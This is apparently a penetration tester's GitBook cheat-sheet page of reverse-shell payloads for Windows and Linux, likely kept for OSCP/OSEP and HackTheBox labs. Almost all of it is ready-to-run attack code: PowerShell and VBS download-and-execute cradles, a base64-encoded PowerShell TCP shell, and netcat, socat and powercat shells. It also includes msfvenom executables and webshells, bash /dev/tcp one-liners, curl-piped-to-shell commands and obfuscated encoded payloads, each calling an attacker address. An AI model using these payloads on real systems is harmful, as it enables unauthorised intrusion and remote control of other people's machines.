Hack-notes
  • Whoami
  • MalDev
    • Reflective loader
  • Academy HackTheBox
    • Attacking Common Applications
      • Attacking Common Applications - Skills Assessment I
      • Attacking Common Applications - Skills Assessment II
      • Attacking Common Applications - Skills Assessment III
    • Attacking Common Services
      • Attacking Common Services - Easy
      • Attacking Common Services - Medium
      • Attacking Common Services - Hard
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
  • HackTheBox-writeups
    • Machines
      • Windows
        • Jab
      • Linux
        • ICLEAN
  • CheatSheet
    • AD
      • linux
      • Windows
      • Bloodhound cypher query
      • Powerview
    • Privilege Escalation
      • Linux
      • Windows
    • Payloads (Reverse shell)
    • Post-Exploitation
      • Windows
    • CLM and Applocker Bypass
  • Your Path to the OSCP+
  • Pwning OSEP with `secrets.txt` on my first attempt
Powered by GitBook
On this page
  • Windows
  • Powershell
  • vbs
  • Powercat
  • HTA
  • SMB
  • MsfVenom
  • Socat
  • Nishang reverse shell powershell
  • nc
  • Linux
  • Common
  • encoded payload
  • Fileless Method

Was this helpful?

  1. CheatSheet

Payloads (Reverse shell)

PreviousWindowsNextPost-Exploitation

Last updated 6 months ago

Was this helpful?

Windows

Powershell

simple payload encoded base64

PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'


PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

PS> $EncodedText =[Convert]::ToBase64String($Bytes)

PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA


PS> exit

encode base64

Fileless Method

"cmd /c powershell IEX(New-Object Net.WebClient).DownloadString('http://IP/Invoke-PowerShellTcp.ps1')"

powershell "IEX(New-Object Net.WebClient).DownloadString('http://IP/Invoke-PowerShellTcp.ps1')"

vbs

CreateObject("WScript.Shell").Run "powershell -ep bypass -w hidden IEX (New-Object System.Net.Webclient).DownloadString('http://10.8.0.173:9001/revshell.txt')"
Set oShell = CreateObject("Wscript.Shell")  
 oShell.run "cmd.exe /c curl 10.8.0.136/nc64.exe -o C:\Windows\Temp\nc64.exe"  
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.0.136 2222 -e cmd.exe"

Powercat

URL encode powercat

%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell

download and execute

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.168/powercat.ps1');powercat -c 192.168.45.168 -p 443 -e powershell

HTA

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.40.130 LPORT=443 -f hta-psh -o thm.hta

mshta.exe http://IP-Server/thm.hta

SMB

smbserver.py -smb2support evil $PWD

#should be executed
//192.168.45.169/evil/shell.exe

MsfVenom

x64

#exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.185 LPORT=8002 -f exe -o shell.exe

certutil.exe -f -urlcache http://192.168.45.153/shell.exe C:\wamp\www\shell.exe

x86

#exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.154 LPORT=80 -f exe -o shell.exe

certutil.exe -f -urlcache http://192.168.45.153/shell.exe C:\wamp\www\shell.exe

webshells

#asp
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp
msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php

#aspx reverseshell
msfvenom -p windows/x64/shell_reverse_tcp -ax64 -f aspx LHOST=10.8.0.173 LPORT=9002 > daz.aspx

Socat

rlwrap nc -lnvp $port
socat.exe TCP4:$ip:$port EXEC:'cmd.exe',pipes

Nishang reverse shell powershell

powershell "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.140/Invoke-PowerShellTcp.ps1')"

encode it in base64

echo "powershell \"IEX(New-Object Net.WebClient).DownloadString(\'http://192.168.45.153/Invoke-PowerShellTcp.ps1\')\"" > shell.txt

cat shell.txt |  iconv -t utf-16le | base64 -w0;echo
powershell -e [put base64 here]

This makes it better than others, like the shell generator on reverseshell.com, which displays errors instead of redirecting them to null

nc

CMD='.\\\\nc.exe 192.168.45.5 443 -e cmd.exe'

Linux

Common

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExOC4yNS80NDQ0IDA+Jg== | base64 -d

<?php echo shell_exec('bash -i > & /dev/tcp/10.11.0.106/443 0>&1');?>

#1- most cases work
busybox nc 192.168.45.153 80 -e /bin/sh

#2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 443 >/tmp/f

#3 url payload
echo {PAYLOAD} | base64 -d | bash

#4 using curl
curl http://IP:8000/shell.sh -o /tmp/shell.sh
chmod +x /tmp/shell.sh
/bin/bash /tmp/shell.sh

#5 generating elf file
msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp -f elf -o shell.elf

encoded payload

echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMTM2LzIyMjIgMD4mMQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash

#Rev-shell URL encoded  
%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.160%2F8001%200%3E%261%27

Fileless Method

#
echo "bash -c 'bash -i >& /dev/tcp/192.168.45.160/8001 0>&1'" > pwn.sh

curl -L http://10.10.10.1/pwn.sh | sh
online